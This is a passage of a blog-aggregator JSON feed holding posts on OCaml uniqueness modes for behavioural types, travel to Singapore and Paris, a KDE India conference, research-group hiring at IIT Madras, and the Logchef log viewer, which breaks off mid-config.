for the discussions which\nspurred this post.",[],{"slug":570,"title":571,"link":572,"pubDate":573,"contentSnippet":574,"tags":575,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"uniqueness-and-behavioural-types","Uniqueness for Behavioural Types","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmodes\u002Foxcaml\u002F2025\u002F05\u002F29\u002Funiqueness_and_behavioural_types\u002F","2025-05-29T17:56:00.000Z","Jane Street has been developing modal types for OCaml – an extension to the\ntype system where modes track properties of values, such as their scope, thread\nsharing, and aliasing. These modes restrict which operations are permitted on\nvalues, enabling safer and more efficient systems programming. 
In this post, I\nfocus on the uniqueness mode, which tracks aliasing, and show how it can\neliminate certain runtime checks.\nMy intention in this post is not to explain how the different modes work. There\nare a number of blog posts and academic papers written about modes. I recommend\nthat the interested reader have a look at them. The following table summarizes the\nmain properties tracked by modes, the corresponding mode names, and resources\nfor further reading:\nProperty | Modes | Resources\nScope | Locality | Blog, Paper\nSharing between threads | Portability, Contention | Blog, Paper\nAliasing | Uniqueness, Linearity | Blog, Paper\nThe OCaml compiler extended with modes is developed in the\nopen, and is used in\nproduction at Jane Street. The repo also has some\ndocumentation\nof the extensions.\nBe warned that the compiler and the language features are evolving fast. The\ncode examples presented in the blog and the paper referenced above are likely\nnot to work. I expect the same for the code examples in this post in the near\nfuture, but that’s what one should expect with these bleeding-edge features.\nBehavioural types and runtime overhead\nA couple of years ago, I wrote a post on behavioural\ntypes, where the\ntypes capture the sequence of operations that may be performed on the values\nwith those types. The correctness of the system depended on the linear use of\nthe resources. Since OCaml does not provide support for enforcing linearity\nstatically, the implementation uses a dynamic check, using a fresh ref cell that\ngets consumed every time the type state changes. If we are statically guaranteed\nthat the resource is not aliased, then there’s no need for the dynamic check.\nThis is where uniqueness helps.\nThe uniqueness mode allows the OCaml compiler to statically guarantee that certain\nvalues are not aliased. This enables optimizations and eliminates the need for\nsome runtime checks, which is particularly valuable in systems programming for\nensuring memory safety and efficient resource management.\nSetting up OCaml with modes\nAn opam repository with the modes extensions and packages supporting modes is\navailable\nhere.\nHere’s how you can set up the new compiler:\n\n# this will take time\nopam switch create 5.2.0+flambda2 --repos with-extensions=git+https:\u002F\u002Fgithub.com\u002Fjanestreet\u002Fopam-repository.git#with-extensions,default\neval $(opam env --switch 5.2.0+flambda2)\n\n\nAn explicitly memory-managed reference\nSuppose you want to implement a mutable reference whose memory is explicitly\nmanaged (not managed by the GC); you may go for the following interface:\n\nmodule type S = sig\n  type 'a t\n  val alloc : 'a -> 'a t\n  val free : 'a t -> unit (* unsafe *)\n  val get : 'a t -> 'a\n  val set : 'a t -> 'a -> unit\nend\n\n\nThis interface provides an explicit free, which releases the memory associated\nwith this reference. This opens up the possibility of memory safety bugs such as\nuse-after-free and double-free. We can use the uniqueness modality to get a safe\nAPI. Here’s the interface:\n\nmodule type S = sig\n  type 'a t\n  val alloc : 'a -> 'a t @ unique\n  val free : 'a t @ unique -> unit\n  val get : 'a t @ unique -> 'a Modes.Aliased.t * 'a t @ unique\n  val set : 'a t @ unique -> 'a -> 'a t @ unique\nend\n\n\nThe unique annotation states that the value is not aliased. The operations on\nthe reference expect that this reference is not aliased. 
Observe that get and\nset take in the unique reference and also return it, unlike the original\ninterface. You can use this like so:\n\n# let okay r =\n    let v, r = get r in\n    let r = set r 20 in\n    free r;;\nval okay : int M.t @ unique -> unit = \u003Cfun>\n\n\nThe key bit is that free consumes the unique reference; you can\nno longer produce a unique handle to the same reference and hence, you cannot\ncall free, get or set on this reference once it has been freed.\n\n# let wont_work r =\n    free r;\n    get r\n  ;;\nError: This value is used here, but it has already been used as unique:\nLine 2, characters 7-8:\n\n\nModes.Aliased.t\nUniqueness applies deeply. If a value is marked as unique, then the transitive\nclosure of the reachable parts of the object is also expected to be unique. The\nreturn value of get is a pair, which is marked as unique¹. Hence, both\nthe components of the pair are expected to be unique. However, we don’t want to\nimpose uniqueness on the value stored in the reference. The language allows\nparts of the value to be marked as aliased. Modes.Aliased.t is defined as:\n\nmodule Aliased : sig\n  type 'a t = { aliased : 'a @@ aliased } [@@unboxed]\nend\n\n\nThe language allows record fields to be annotated as aliased, while the record\nitself may be uniquely referenced.\nImplementation\nHere’s an implementation that satisfies the signature.\n\nmodule M : S = struct\n  type 'a t = { mutable value : 'a }\n  let alloc x = { value = x }\n  let free t = ()\n  let get t =\n    let a = Modes.Aliased.{aliased = t.value } in\n    a, t\n  let set t x =\n    t.value \u003C- x;\n    t\nend\n\n\nThere’s nothing surprising about this implementation. Note that the compiler is\ndoing a lot of work behind the scenes to ensure that the functions do in fact\nsatisfy the uniqueness requirements. For example, if you change the\nimplementation of set to do something innocuous where the compiler cannot\nprove that the value is not aliased, the program no longer compiles:\n\n# let set t x =\n    t.value \u003C- x;\n    let t' = Fun.id t in (* compiler cannot prove [t'] is not aliased *)\n    t'\nError: \u003Csnip>\nValues do not match:\n val set : 'a t -> 'a -> 'a t\nis not included in\n val set : 'a t @ unique -> 'a -> 'a t @ unique\nThe type 'a t -> 'a -> 'a t is not compatible with the type\n 'a t @ unique -> 'a -> 'a t @ unique\n\n\nRefs that explain their work\nThe earlier blog\npost\nused polymorphic variants to encode the protocol of operations that are\npermitted on a ref cell. The implementation is reproduced below:\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n\n  val ref   : 'a -> ('a, 'b) ref\n  val read  : ('a, [`Read of 'b]) ref\n              -> 'a * ('a, 'b) ref\n  val write : ('a, [`Write of 'b]) ref\n              -> 'a\n              -> ('a, 'b) ref\nend\nmodule Ref : Ref =\nstruct\n\n  type ('a, 'b) ref =\n    {contents     : 'a;\n     mutable live : bool} (* For linearity *)\n     constraint 'b = [>]\n\n  let ref v = {contents = v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = v; live = true }\n\n  let branch r _ = check r; fresh r\nend\n\n\nObserve that we use a dynamic check to enforce linearity. It requires a fresh\nref cell for each operation performed on this reference. 
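To make the overhead concrete, here is a small hedged sketch (assuming the Ref module above, and a LinearityViolation exception defined as in the original post) showing that a violation only surfaces when the code runs, not when it is compiled:\n\nopen Ref\n\nlet double_read () =\n  let r = ref 0 in        (* fresh cell, live = true *)\n  let _v, _r' = read r in (* consumes [r]; returns a fresh handle *)\n  read r                  (* type-checks, but reusing the stale [r] raises LinearityViolation at runtime *)\n\nThe mistake compiles fine and only blows up when double_read is actually executed.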
With uniqueness, we can\nenforce this statically, avoiding the dynamic check and the fresh ref cell\nrequirement.\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n  (* 'b is the behavioural type variable *)\n\n  val ref   : 'a -> ('a, 'b) ref @ unique\n  val read  : ('a, [`Read of 'b]) ref @ unique\n              -> 'a Modes.Aliased.t * ('a, 'b) ref @ unique\n  val write : ('a, [`Write of 'b]) ref @ unique\n              -> 'a\n              -> ('a, 'b) ref @ unique\n  val branch : ('a, [>] as 'b) ref @ unique\n               -> (('a, [>] as 'c) ref @ unique -> 'b)\n               -> ('a, 'c) ref @ unique\nend\n\nmodule Ref : Ref =\nstruct\n  type ('a, 'b) ref = {mutable contents : 'a} constraint 'b = [>]\n\n  let ref v = {contents = v}\n\n  let read r =\n    let c = Modes.Aliased.{aliased = r.contents} in\n    c, Obj.magic_at_unique r\n\n  let write r v =\n    r.contents \u003C- v;\n    Obj.magic_at_unique r\n\n  let branch r _ = Obj.magic_at_unique r\nend\n\n\nThe only changes necessary in the signature were a number of uniqueness and\naliasing annotations. Notice that the implementation no longer needs the\ndynamic check! Obj.magic_at_unique has the type 'a @ unique -> 'b @ unique,\nand is the version of Obj.magic with uniqueness annotation. We use it to\nadvance the protocol type state.\nWhere next\nThe rest of the examples in the original\npost should also\nbenefit from uniqueness annotations to remove the runtime overheads.\nThe complete code examples are available\nhere.\nYou can also play with the code examples directly in the\nbrowser thanks to Patrick\nFerris’ OCaml with extensions\njs_of_ocaml top-level.\nSince the modes features are constantly evolving, there are no stability\nguarantees yet. However, I’m excited about the possibility of modes improving\nhow we do safe systems programming in OCaml.\nAddendum\nLooks like there’s a part 2 of this post.\nFootnotes\nUnclear whether it is possible to return a pair where one of the\ncomponents is unique, but the other one is not. ↩",[],{"slug":577,"title":578,"link":579,"pubDate":580,"contentSnippet":581,"tags":582,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"singapore-visa","Singapore Visa Process","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fsingapore-visa\u002F","Tue, 27 May 2025 20:20:49 +0530","In November 2024, Badri and I applied for a Singapore visa to visit the country. To apply for a Singapore visa, you need to visit an authorized travel agent listed by the Singapore High Commission on their website. Unlike the Schengen visa (where only VFS can process applications), the Singapore visa has many authorized travel agents to choose from. I remember that the list mentioned as many as 25 authorized agents in Chennai. For my application, I randomly selected Ria International in Karol Bagh, New Delhi from the list.\nFurther, you need to apply not more than a month before your travel dates. As our travel dates were in December, we applied in the month of November.\nFor your reference, I submitted the following documents:\nPassport\nMy photograph (35 mm x 45 mm)\nVisa application form (Form 14A)\nCover letter to the Singapore High Commission, New Delhi\nProof of employment\nHotel booking\nFlight ticket (reservations are sufficient)\nBank account statement for the last 6 months\nI didn’t have my photograph in the specified dimensions, so the travel agent took my photo on the spot. The visa application was ₹2,567. 
Furthermore, I submitted my application on a Saturday and received a call from the travel agent on Tuesday informing me that they had received my visa from the Singapore High Commission.\nThe next day, I visited the travel agent’s office and picked up my passport and a black and white copy of my e-visa. Later, I downloaded a PDF of my visa from the website mentioned on it, and took a colored printout myself.\nSingapore granted me a multiple-entry visa for 2 months, even though I had applied for a 4-day single-entry visa. We were planning to add more countries to this trip; therefore, a multiple-entry visa would be helpful in case we wanted to use Singapore Airport, as it has good connectivity. However, it turned out that flights from Kuala Lumpur were much cheaper than those from Singapore, so we didn’t enter Singapore again after leaving.\nBadri also did the same process but entirely remotely—he posted the documents to the visa agency in Chennai, and got his e-visa in a few days followed by his original passport, which was delivered by courier.\nHe got his photo taken in the same dimensions mentioned above, and printed with a matte finish as instructed. However, the visa agents asked why his photo looked so faded. We don’t know if they thought the matte finish was faded or what. To rectify this, Badri emailed them a digital copy of the photo (both the cropped version and the original) and they handled the reprinting on their end (which he never got to see).\nBefore entering Singapore, we had to fill in an arrival card - an online form asking a few details about our trip - within 72 hours of our arrival in Singapore.\nThat’s it for now. Meet you in the next post.\nThanks to Badri for reviewing the draft.",[],{"slug":584,"title":585,"link":586,"pubDate":587,"contentSnippet":588,"tags":589,"maintainerName":410,"maintainerUsername":411,"maintainerPhoto":412,"feedUrl":413},"national-anthem","What the National Anthem?","https:\u002F\u002Fworkdone0.substack.com\u002Fp\u002Fnational-anthem","Sat, 24 May 2025 00:00:00 GMT","In the final episode of Game of Thrones, Tyrion Lannister asks a powerful question:",[],{"slug":591,"title":592,"link":593,"pubDate":594,"contentSnippet":595,"tags":596,"maintainerName":202,"maintainerUsername":203,"maintainerPhoto":204,"feedUrl":205},"mcp-seems-viral","MCP seems viral","https:\u002F\u002Fnadh.in\u002Fblog\u002Fmcp-seems-viral\u002F","Mon, 19 May 2025 00:00:00 +0000","MCP (Model Context Protocol)[1]\n is all the rage now. Introduced by Anthropic about four months ago, it has already been accepted as an open standard and has seen widespread adoption, including by major AI companies and prominent AI tool makers. There is even a directory[2]\n listing over 13,000 MCP implementations. Technically, it is a very simple API spec that facilitates RPC-like (Remote procedure call) communication between an AI and an external system. 
It enables any external system to advertise its capabilities—returning information or performing various actions—allowing AI systems to dynamically and “automagically” use those capabilities via API calls.",[],{"slug":598,"title":599,"link":600,"pubDate":601,"contentSnippet":602,"tags":603,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"kde-india-conference-2025","KDE India Conference 2025","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fkde-india-conference-2025\u002F","Tue, 13 May 2025 23:28:18 +0530","Last month, I attended the KDE India conference in Gandhinagar, Gujarat from the 4th to the 6th of April. I made up my mind to attend when Sahil told me about his plans to attend and give a talk.\nA day after my talk submission, the organizer Bhushan contacted me on Matrix and informed me that my talk had been accepted. I was also informed that KDE would cover my travel and accommodation expenses. So, I planned to attend the conference at this point. I am a longtime KDE user, so why not ;)\nI arrived in Ahmedabad, the twin city of Gandhinagar, a day before the conference. The first thing that struck me as soon as I came out of the Ahmedabad airport was the heat. I felt as if I was being cooked—exactly how Bhushan put it earlier in the group chat. I took a taxi to get to my hotel, which was close to the conference venue.\nLater that afternoon, I met Bhushan and Joseph. Joseph lived in Germany. Bhushan was taking him to get a SIM card, so I tagged along and got to roam around. Joseph was unsure about where to go after the conference, so I asked him what he wanted out of his trip and had conversations along that line.\nLater, Vishal convinced him to go to Lucknow. Since he was adamant about taking the train, I booked a Tatkal train ticket for him to Lucknow. He was curious about how Tatkal booking works and watched me in amusement while I was booking the ticket.\nThe 4th of April marked the first day of the conference, with around 25 attendees. Bhushan started the day with an overview of KDE conferences in India, followed by Vishal, who discussed FOSS United’s activities. After lunch, Joseph gave an overview of his campaign to help people switch from Windows to GNU\u002FLinux for environmental and security reasons. He continued his session in detail the next day.\n\n      \nConference hall\nA key takeaway for me from Joseph’s session was the idea pointed out by Adwaith: marketing GNU\u002FLinux as a cheap alternative may not attract as much attention as marketing it as a status symbol. He gave the example of how the Tata Nano didn’t do well in the Indian market due to being perceived as a poor person’s car.\nMy talk was scheduled for the evening of the first day. I hadn’t prepared any slides because I wanted to make my session interactive. During my talk, I did an activity with the attendees to demonstrate the federated nature of XMPP messaging, of which Prav is a part. After the talk, I got a lot of questions, signalling engagement. The audience was cooperative (just like Prav ;)), contrary to my expectations (I thought they would be tired and sleepy).\nOn the third day, I did a demo on editing OpenStreetMap (referred to as “OSM” for short) using the iD editor. It involved adding points to OSM based on the students’ suggestions. Since my computer didn’t have an HDMI port, I used Subin’s computer, and he logged into his OSM account for my session. Therefore, any mistakes I made will be under Subin’s name. 
:)\nOn the third day, I attended Aaruni’s talk about backing up a GNU\u002FLinux system. This was the talk that resonated with me the most. He suggested formatting the system with the btrfs file system during the installation, which helps in taking snapshots of the system and provides an easy way to roll back to a previous version if, for example, a file is accidentally deleted. I have tried many backup techniques, but never this one - backing up on the internal disk. I’ll certainly give this a try.\nA conference is not only about the talks; that’s why we had a Prav table as well ;) Just kidding. What I really mean is that a conference is more about interactions than talks. Since the conference was a three-day affair, attendees got plenty of time to bond and share ideas.\n\n      \nPrav stall at the conference\n\n      \nConference group photo\nAfter the conference, Bhushan took us to Adalaj Stepwell, an attraction near Gandhinagar. Upon entering the complex, we saw a park where there were many langurs. Going further, there were stairs that led down to a well. I guess this is why it is called a stepwell.\n\n      \nAdalaj Stepwell\nLater that day, we had Gujarati Thali for dinner. It was an all-you-can-eat buffet and was reasonably priced at 300 rupees per plate. Aamras (Mango juice) was the highlight for me. This was the only time we had Gujarati food during this visit. After dinner, Aaruni dropped Sahil and me off at the airport. The hospitality was superb - for instance, in addition to Aaruni dropping us, Bhushan also picked up some of the attendees from the airport.\nFinally, I would like to thank KDE for sponsoring my travel and accommodation costs.\nLet’s wrap up this post here and meet you in the next one.\nThanks to contrapunctus and Joseph for proofreading.",[],{"slug":605,"title":606,"link":607,"pubDate":608,"contentSnippet":609,"tags":610,"maintainerName":611,"maintainerUsername":612,"maintainerPhoto":613,"feedUrl":614},"encrypted-adns","Security And Encryption In Authoritative DNS","https:\u002F\u002Fshrirangkahale.com\u002Fposts\u002Fencrypted-adns\u002F","Sun, 11 May 2025 09:43:19 +0000","The Internet as we know it today emerged from ARPANET, a research network made by the US DoD. Technologies like TCP\u002FIP formed the basis of ARPANET, the first network to use IP-based communication.\nARPANET was eventually dissolved, but new networks were formed, and with growing ideas and technology, the Internet was born.\nPeople to this day reminisce about the dot-com bubble, a period of rapid internet growth.",[],"Shrirang Kahale","albonycal","\u002Fimages\u002Falbonycal_photo.png","https:\u002F\u002Fshrirangkahale.com\u002Findex.xml",{"slug":616,"title":617,"link":618,"pubDate":619,"contentSnippet":620,"tags":621,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"paris","A visit to Paris","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fparis\u002F","Tue, 06 May 2025 01:32:43 +0530","After attending the 2024 LibreOffice conference in Luxembourg, I visited Paris in October 2024.\nIf you are wondering whether I needed another visa to cross the border into France— I didn’t! Further, both countries are EU members, which means you don’t need to go through customs either. 
Thus, crossing the Luxembourg-France border is no different from crossing Indian state borders - like going from Rajasthan to Uttar Pradesh.\nI took a TGV train from Luxembourg Central Station, which was within walking distance from my hostel. The train took only 2 hours and 20 minutes to cover the 300 km distance to Paris. It departed from Luxembourg at 10:00 AM and reached Paris at 12:20 PM. The ride was smooth and comfortable, arriving on time. It gave me an opportunity to see the countryside of France. I booked the train ticket online a couple of days prior through the Omio website.\n\n      \nTGV train I rode from Luxembourg to Paris\nI planned the first day with my friend Joenio, whom I met upon arriving at Paris’ Gare de l’Est station, along with his wife Mari. We went to my hostel (which was within walking distance from the station) to store my luggage, but we were informed that we needed to wait for a couple of hours before I could check in. Consequently, we went to an Italian restaurant nearby for lunch, where I ordered pasta. My hostel was so unbelievably cheap by French standards (25 euros per night) that Joenio was shocked when he learned about it.\n\n      \nPasta I had in Paris\nWalking in the city, I noticed it had separate cycling tracks and wide footpaths, just like Luxembourg. The traffic was also organized. For instance, there were traffic lights even for pedestrian crossings, unlike India, where crossing roads can be a nightmare. Car drivers stopping for pedestrians is a big improvement over what I am used to in India. The weather was also pleasant. It was a bit on the cooler side - around 15 degrees Celsius - and I had to wear a jacket.\n\n      \nA cycling track in Paris\nAfter lunch, we returned to my hostel for my check-in at around 3 o’clock. Then, we went to the Luxembourg Museum (Musée du Luxembourg in French) as Joenio had booked tickets for an exhibition of paintings by the Brazilian painter Tarsila do Amaral. To reach there, we took a subway train from Gare du Nord station. The Paris subway charges 2.15 euros irrespective of the distance (or number of stations) traveled, unlike the other metro systems I have used.\nWe reached the museum at around 4 o’clock. I found the paintings beautiful, but I would have appreciated them much more if the descriptions had been in English.\n\n      \nLuxembourg Museum\nAfterward, we went to a beautiful garden just behind the museum. It served as a great spot to relax and take pictures. Following this, we walked to the Pantheon - a well-known attraction in the city. It is a church built a couple of centuries ago. It has a dome-shaped structure at the top, recognizable from far away.\n\n      \nA shot of the park near the Luxembourg Museum\n\n      \nPantheon, one of the attractions of Paris.\nThen we went to Notre Dame after having evening snacks and coffee at a nearby bakery. The Notre Dame was just over a kilometer from the Pantheon, so we took a walk. We also crossed the beautiful Seine river. On the way, I sampled a crêpe, a signature dish of France. The shop was named Crêperie and had many varieties of crêpe. I took the one with eggs and Emmental cheese. It was savory and delicious.\n\n      \nPhoto with Joenio and Mari\n\n      \nNotre Dame, another tourist attraction of Paris.\nBy the time we reached Notre Dame, it was 07:30 PM. I learned from Joenio that Notre Dame was closed and being renovated due to a fire a couple of years ago, so we just sat around and clicked photos. 
It is a catholic cathedral built in French Gothic architecture (I read that on Wikipedia ;)). I also read that it is located on an island named Île de la Cité, and I didn’t even realize we were on an island.\nAt night, we visited the most well-known attraction of Paris, The Eiffel Tower. We again took the subway, alighting at the Bir-Hakeim station, followed by a short walk. We reached the Eiffel Tower at 9 o’clock. It was lit bright yellow. There was not much to do there, so we just clicked photos and hung out. After that, I came back to my hostel.\n\n      \nMy photo with Eiffel Tower in the background\nThe next day, I roamed around the city, mostly on foot. France is known for its bakeries, so I checked out a couple of local bakeries. I had espresso a couple of times and sampled croissant, pain au chocolat and lemon meringue tartlet.\n\n      \nItems at a bakery in Paris. Items from left to right are: Chocolate Twist, Sugar briochette, Pain au Chocolat, Croissant with almonds, Croissant, Croissant with chocolate hazelnut filling.\nHere are some random shots:\n\n      \nThe Paris subway\n\n      \nInside a Paris subway\n\n      \nA random building and road in Paris\n\n      \nA shot near the Seine river\n\n      \nA view of the Seine river\nOn the third day, I had my flight for India. Thus, I checked out of the hostel early in the morning and took an RER train from Gare du Nord station to reach the airport. It cost 11.8 euros.\nI am listing my expenses during my 3-day stay in Paris below:\nCategory | Amount (in euros)\nFood | €40\nPublic Transport | €20\nAccommodation (2 nights) | €50\nTotal | €110\nI heard some of my friends had bad experiences in France. Thus, I had the impression that I would not feel welcomed. Furthermore, I had encountered language problems during my previous Europe trip, in Albania and Kosovo. Therefore, I learned a couple of French words, like how to say thank you and good morning, which went a long way.\nHowever, I didn’t have bad experiences in Paris, except for one instance in which I asked my hostel’s reception about my misplaced watch and the person at the reception asked me to be “polite” by being rude. She said, “Excuse me! You don’t know how to say Good Morning?”\nOverall, I enjoyed my time in Paris and would like to thank Joenio and Mari for showing me around. I would also like to thank Sophie for giving me a map of Paris, which was handy.\nLet’s end this post here. I’ll meet you in the next one!\nCredits: Thanks to contrapunctus for reviewing this post before publishing",[],{"slug":623,"title":624,"link":625,"pubDate":626,"contentSnippet":627,"tags":628,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"working-with-me","Joining my group","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fiitm\u002Fcommunity\u002F2025\u002F04\u002F28\u002Fworking-with-me\u002F","2025-04-28T12:10:00.000Z","Recently, I posted on X and\nLinkedIn\nthat I am always looking for excellent people to join my group. I received a lot\nof enquiries, some of which led to internship hires (yay!). But mostly, I seemed\nto offer similar advice. I thought I’d write a post that summarises my responses.\nAt IIT Madras, my research group develops\nprogramming language abstractions to solve systems problems. The group is\ncomposed of research associates (fixed-term project staff), PhD, MS and MTech\nstudents, undergraduate research students (who are typically BTech students from\nIIT Madras) and interns. 
I made the following post a few weeks ago, for which I\nreceived a lot of enquiries, and I have been busy writing similar responses to\nmany of them, which I summarise below.\nPSA: I'm always looking for excellent folks to join my research group at IIT Madras to work on building \"functional\" systems. This includes internships, MS and PhD studentships, research staff positions, and post-baccalaureate fellowships. \nReach out to me if you are keen!\n— KC Sivaramakrishnan (@kc_srk) April 15, 2025\n \n\n\nInternship positions\nInternship enquiries are the most frequent ones that I receive. Here’s how you\ncan make it work. Please do go through my web page to\nlook at what areas I work on. Write to me about what interests you and what your\ngoals are.\nMy group works on systems. To make the internship work well, we require that you\nhave demonstrable systems building experience. Do build projects that go beyond\nyour coursework. Make sure that the projects are developed publicly on GitHub\nor other similar platforms so that one can take a look at what you’ve\nbuilt. Even better are contributions to other open-source projects.\nThe group solves systems problems with functional programming. If you have prior\nexperience with functional programming, such as building small projects with\nOCaml, Haskell, Scala, Scheme or other languages, it is easier for me to assess\nyour interest. That said, if you are great at any programming language, having\nbuilt non-trivial projects in any language, then you have the right skills for\ninternships in my group. Generally, I expect the interns to have done course\nwork on OS, compilers and computer architecture. Significant projects in any of\nthose areas are a huge plus.\nI should clarify that my recommendation letters for graduate programs will\nreflect my honest assessment of the internship. I will decline writing a\nrecommendation letter if I think I may not be able to provide a strong one.\nI do not work on projects that are primarily AI\u002FML or Web Development. If you\nwrite to me looking for projects in those areas, it is very likely that you\nwon’t hear from me. Please don’t bulk email faculty CCing or BCCing everyone in\nthe department. It is likely that no one will read such an email.\nPhD\u002FMS\u002FMTech positions\nFor academic positions, please have a look at https:\u002F\u002Fresearch.iitm.ac.in\u002F.\nThere are alternative ways to enter MS and PhD positions by being a research\nassociate and completing some coursework at IITM. For more information, see\nhere.\nContributing to the OCaml community\nA significant chunk of the enquiries were from folks who hold full-time\npositions looking to be involved in the research group. Unfortunately, making\npart-time positions work is a challenge for both sides. I would encourage\ncontributions to the wider OCaml community.\nThere are several great ways to get involved with the community. Here’s what I\nusually recommend.\nLearn the basics.\n    \nGo through the OCaml part of my CS3100 course. The course has a YouTube\nplaylist and programming assignments. 
Complete the programming assignments.\nRead the Real World OCaml book.\nThere are lots of other resources at OCaml.org, the official website of the OCaml community and the ecosystem.\nJoin the community.\n    \nOCaml discord and discuss are great places to hang out with other OCaml folks and ask questions.\nDiscord is better for quick clarifications and discuss for longer form discussions.\nLook for “good first issues” in the OCaml projects and work on them\n    \nCheck out the core platform tools under the OCaml github org. See OCaml compiler, dune build system, opam package manager, ocaml.org, etc.\nAcross the wider ecosystem – SemGrep, OpenGrep, Rocq, etc.\nWork on self-directed projects. Here is my list of ideas.\nThe OCaml community also participates in Outreachy\ninternships. Outreachy internships are paid\ninternships for underrepresented groups. It is a great way to contribute to the\ncommunity while being mentored by folks from the OCaml community. Here’s a nice\nintro (in Tamil) to the\nimpact that the Outreachy program had on an Outreachy intern. Look out for\nannouncements about\nOutreachy internships in the OCaml discuss forum.\nResearch Associate positions\nThis is for folks who want to contribute to the core research programme but do\nnot see themselves joining academic programs. The expectation here is that you\nare an experienced systems engineer, who should see themselves easily qualifying\nfor the internship positions in the group.\nOne useful way to look at this position is similar to a research software\ndevelopment engineer who helps build out the systems used for research or\ntranslate research to practice. In the past, research associates have helped\nupstream multicore\nOCaml.\nThe easiest way to get into this role would be to do an internship, see whether\nyou like this area, do well in the internship and then choose to apply to a\nresearch associate position.\nAnother variant is a post-bacc or a pre-doc position aimed at highly motivated\nrecent graduates, who are looking to build research experience. The expectation\nhere is that we get papers into top venues in PL and Systems. For such students,\nI recommend going through my CS6225 Programs and Proofs\ncourse, watch the video\nlectures\nand complete the\nassignments.\nThe course is not an easy one, but will expose you to the broad area of PL and\nspecifically to deductive program verification. At the very least, you will come\nout with an understanding of what it is to think rigorously about program\ncorrectness.\nResearch associate positions are fixed-term positions. In order to make this\nwork, the tenure should be at least 18 months.\nSummary\nWhile I may not be hiring actively all the time, do reach out to me if you are\ninterested in any of the above. Please follow me on\nLinkedIn,\nX or Bluesky,\nwhere I am likely to announce any open positions.",[],{"slug":630,"title":631,"link":632,"pubDate":633,"contentSnippet":634,"tags":635,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"announcing-logchef","Announcing Logchef","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002Fannouncing-logchef\u002F","2025-04-27T00:00:00.000Z","So, for the last 3-4 months, I’ve been busy building Logchef. This tool basically grew straight out of my day job at Zerodha, where I’ve been managing logs for almost half a decade. 
I wanted to share a bit about how Logchef came to be.\nLike many, we journeyed through the complexities of ELK (a management nightmare) and found its OSS fork, OpenSearch, didn’t quite hit the mark for us either. We eventually found solid ground with Clickhouse, as detailed on our tech blog: Logging at Zerodha.\nChallenges Faced with Metabase#\nHowever, as I noted in that post, while Metabase served us well for analytics, it wasn’t the ideal UI specifically tailored for log analysis against Clickhouse:\n“While Metabase has served us well so far, there is certainly room for improvement, especially regarding a more tailored UI for Clickhouse… we plan to continue exploring potential solutions.”\nHere’s a distilled version of the common pain points we experienced:\nAd-hoc Querying Was Painful: Writing raw Clickhouse SQL in Metabase for quick log searches felt cumbersome and slow. Even modifying existing complex query templates was error-prone – a tiny syntax mistake could lead to minutes spent debugging the query itself, especially stressful during production incidents.\nDisconnect Between Visualization and Raw Logs: A common workflow is to visualize trends (e.g., errors over time) and then drill down into the specific logs causing those trends. In Metabase, this often meant writing two separate queries – one for aggregation\u002Fvisualization and another (often rewritten from scratch) just to see the raw log lines. Metabase’s row limits (around 2k) further complicated viewing the full context of raw logs after filtering.\nThe intuitive “slice and drill-down” experience many log tools offer was missing.\nUI\u002FUX Annoyances: Several smaller but cumulative issues added friction: difficulty selecting precise time ranges like “last 6 hours,” viewing logs immediately surrounding a relevant event, columns getting truncated (...), and limited timestamp precision display in results. Though there are some workarounds, they often felt like band-aids rather than solutions.\nTL;DR: Metabase interface wasn’t optimized for the specific task of log exploration. Debugging sessions that should have taken minutes were stretching significantly longer. Querying and exploring logs felt clunkier than it needed to be.\nAnd one fine day, I decided to stop just wishing for a better tool and start building one:\n\nLogchef#\nWhen I first started prototyping, I kept the scope pretty tight: just build a viewer for the standard OTEL schema. OTEL’s flexible enough, but a quick chat with Kailash  sparked what turned out to be a game-changing idea: make Logchef schema-agnostic. And that really became the core concept.\nBasically, Logchef lets you connect it straight to your existing Clickhouse log tables, no matter their structure. All it really needs is a timestamp field (DateTime or DateTime64). Bring your own custom schemas, stick with the OTEL standard, or even adapt it to your own needs. Logchef doesn’t force you into a specific format. From what I’ve seen, not many tools offer this kind of plug-and-play flexibility with existing tables today.\nLogchef is designed as a specialized query and visualization layer sitting on top of Clickhouse. Logchef intentionally excludes log collection and ingestion. Why reinvent the wheel when excellent tools like Vector, Fluentbit, Filebeat, etc., already handle this reliably? 
Logchef focuses purely on exploring the logs once they’re in Clickhouse.\nStack#\nBackend: Written in Go for performance and concurrency.\nMetadata Storage: Uses SQLite for lightweight management of users, teams, Clickhouse source connections, and query collections. It’s simple and perfectly suited for this kind of metadata store.\nFrontend: An interactive log viewer built with Vue.js and styled with shadcn\u002Fui and Tailwind CSS. I also implemented a simple search syntax for common filtering tasks (e.g., status=200 and path~\"\u002Fapi\u002F\"). This involved writing a tokenizer and parser that translates this syntax into efficient ClickHouse SQL conditions optimised for querying logs. Building this parser and validator, and integrating them smoothly with the Monaco editor for syntax highlighting, was a significant effort, but I’m quite happy with the end result.\nSetting Up the Public Demo (demo.logchef.app)#\n\nI wanted a public demo instance so people could try Logchef easily. Setting this up involved a few specific tweaks compared to a standard deployment, all managed within the Docker Compose setup:\nGenerating Dummy Data: A log viewer isn’t much use without logs! Instead of ingesting real data, I configured vector using its demo_logs source type. This continuously generates realistic-looking syslog and HTTP access logs and pushes them into the demo Clickhouse instance (syslogs and http_logs tables). It gives users immediate data to query without any setup on their part.\n# vector.toml snippet\n[sources.generate_syslog]\ntype = \"demo_logs\"\nformat = \"syslog\"\ninterval = 0.3 # Generate logs 